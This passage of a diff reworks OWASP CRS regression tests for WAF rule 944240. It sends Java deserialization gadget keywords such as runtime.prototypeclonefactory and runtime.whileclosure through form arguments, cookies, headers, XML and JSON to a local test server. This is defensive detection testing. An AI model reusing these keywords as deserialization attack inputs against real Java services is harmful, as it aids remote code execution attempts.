Cookie: runtime.prototypeclonefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 60 desc: "Request header test includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 61 desc: "XML attribute value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 62 desc: "XML element value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log: + expect_ids: [944240] + - test_id: 63 desc: "Nested XML element value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log: + expect_ids: [944240] + - test_id: 64 desc: "Content-Type text/plain includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + output: + log: + expect_ids: [944240] + - test_id: 65 desc: "Content-Type application/json arg value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.prototypeclonefactory\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-66 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeclonefactory\"}" + output: + log: + expect_ids: [944240] + - test_id: 66 desc: "Content-Type application/json arg name includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.prototypeclonefactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-67 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.prototypeclonefactory\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 67 desc: "Argument test includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-68 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log: + expect_ids: [944240] + - test_id: 68 desc: "Argument name includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-69 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory=test" + output: + log: + expect_ids: [944240] + - test_id: 69 desc: "Cookie test includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 70 desc: "Cookie name includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.prototypeserializationfactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.prototypeserializationfactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 71 desc: "Request header test includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 72 desc: "XML attribute value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 73 desc: "XML element value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory" + output: + log: + expect_ids: [944240] + - test_id: 74 desc: "Nested XML element value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory" + output: + log: + expect_ids: [944240] + - test_id: 75 desc: "Content-Type text/plain includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log: + expect_ids: [944240] + - test_id: 76 desc: "Content-Type application/json arg value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.prototypeserializationfactory\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeserializationfactory\"}" + output: + log: + expect_ids: [944240] + - test_id: 77 desc: "Content-Type application/json arg name includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.prototypeserializationfactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.prototypeserializationfactory\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 78 desc: "Argument test includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log: + expect_ids: [944240] + - test_id: 79 desc: "Argument name includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.whileclosure=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.whileclosure=test" + output: + log: + expect_ids: [944240] + - test_id: 80 desc: "Cookie test includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 81 desc: "Cookie name includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.whileclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.whileclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 82 desc: "Request header test includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-83 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 83 desc: "XML attribute value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-84 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 84 desc: "XML element value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-85 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.whileclosure" + output: + log: + expect_ids: [944240] + - test_id: 85 desc: "Nested XML element value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-86 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.whileclosure" + output: + log: + expect_ids: [944240] + - test_id: 86 desc: "Content-Type text/plain includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log: + expect_ids: [944240] + - test_id: 87 desc: "Content-Type application/json arg value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.whileclosure\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + 